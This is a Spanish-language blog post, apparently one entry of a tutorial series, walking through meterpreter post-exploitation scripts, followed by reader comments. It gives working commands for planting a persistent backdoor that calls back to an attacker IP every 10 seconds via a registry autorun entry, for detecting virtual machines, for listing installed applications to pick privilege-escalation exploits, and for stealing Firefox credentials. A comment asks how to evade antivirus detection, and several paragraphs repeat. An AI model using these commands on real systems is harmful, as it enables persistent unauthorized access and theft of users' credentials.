A continuación veremos distintos de estos scripts con las mas dispares funcionalidades pero todos útiles de un modo u otro.
Persistencia
La orden persistance (antecedida por run) permite a meterpreter anclarse al inicio del sistema e intente establecer conexiones con la máquina atacante cada X tiempo.
El siguiente comando permite que al inicio del sistema comprometido y en intervalos de 10 segundos éste intente conectar con la máquina del atacante:
run persistance -U -p 31337 -r 192.168.0.108 -i 10
donde:
También de forma simple es posible ver las aplicaciones que tiene el equipo comprometido instaladas y su respectiva versión. Esto puede ser muy útil a la hora de buscar determinados exploits para, por ejemplo, escalar privilegios.
Para obtener jugosa información del navegador zorruno, existe otro script para hacernos la vida mas facil. Éste se encargará de descargar a nuestro equipo los archivos necesarios para después analizarlos con comodidad.
Existen gran cantidad de scripts para obtener las credenciales e información útil de muchos programas incluso en distintas versiones de éstos. Su utilización es similar a la de Firefox, basta con buscarlos en "post/multi/gather".
Si se requieren las variables de entorno del equipo comprometido, su obtención es tan rápida como:
Y con esto cerramos la primera entrada del año y relaciona con los scripts de meterpreter. Quedan un par mas relacionadas con run y cerraremos la subsaga de meterpreter.
Un saludo, nos leemos en breve ;).
- -U => Ejecuta meterpreter cuando la víctima accede a su sistema.
- -p <puerto a la escucha> => El puerto del equipo del atacante en donde se conectará la víctima, es necesario que el atacante tenga un "handler" escuchando en este puerto como vimos en anteriores entregas.
- -r <IP atacante> => La dirección IP del atacante.
- -i <segundos> => El intervalo en segundos en el que la víctima intentará establecer conexión con el atacante.
Una vez ejecutado, agrega una entrada de meterpreter al registro de Windows en la sección de las aplicaciones que arrancan al inicio.
Para probar que funciona, cerramos la sesión de meterpreter y ponemos Metasploit a escuchar el puerto especificado antes (con el handler). En breve (en función del intervalo especificado) veremos como la víctima se conecta automáticamente.
¿ Es la víctima una máquina virtual?
El siguiente script permite saber si el sistema comprometido es o no una máquina virtual. Para ello basta con:
run checkvm
Aplicaciones en el equipo comprometido
También de forma simple es posible ver las aplicaciones que tiene el equipo comprometido instaladas y su respectiva versión. Esto puede ser muy útil a la hora de buscar determinados exploits para, por ejemplo, escalar privilegios.
run get_application_list
Obtener las credenciales de Firefox
Para obtener jugosa información del navegador zorruno, existe otro script para hacernos la vida mas facil. Éste se encargará de descargar a nuestro equipo los archivos necesarios para después analizarlos con comodidad.
run post/multi/gather/firefox_creds
Existen gran cantidad de scripts para obtener las credenciales e información útil de muchos programas incluso en distintas versiones de éstos. Su utilización es similar a la de Firefox, basta con buscarlos en "post/multi/gather".
Variables de entorno
run get_env
Y con esto cerramos la primera entrada del año y relaciona con los scripts de meterpreter. Quedan un par mas relacionadas con run y cerraremos la subsaga de meterpreter.
Un saludo, nos leemos en breve ;).
4 comentarios:
Solo un gran saludo.,
<>.,
Una Pregunta Aetsu, meterpreter se podria ver como un troyano? pero en base a consola, cuando genera el binario y este se ejecuta en el equipo de la victima, otra pregunta si ejecuto el binario en el equipo por primera ves, pero la victima apaga el equipo y lo enciende, yo aun no he tenido conexion con la maquina afectada para dar los parametros de RUN y persistencia se perderia la conexion, Agradezco Mucho tan valiosa informacion, Gracias por compartir tu conocimiento.
Desde mi punto de vista, si que puedes considerar meterpreter como un troyano pues tiene muchas funcionalidades que poseen los troyanos.
Respecto a lo otro, cuando la victima ejecute el binario con meterpreter, debes tener un metasploit escuchando en la IP que has configurado en meterpreter para recibir las conexiones. Es posible que haya otros métodos de hacerlo cuando generes el payload, pero las desconozco :(.
Un saludo.
El comando "run vnc" no puede ser encritpado o de alguna manera bypaseado para que un AV no lo detecte? ya que el AV lo detecta, y hay AV que no se los puede matar con killav.
Buen aporte muchas gracias genio :)
Publicar un comentario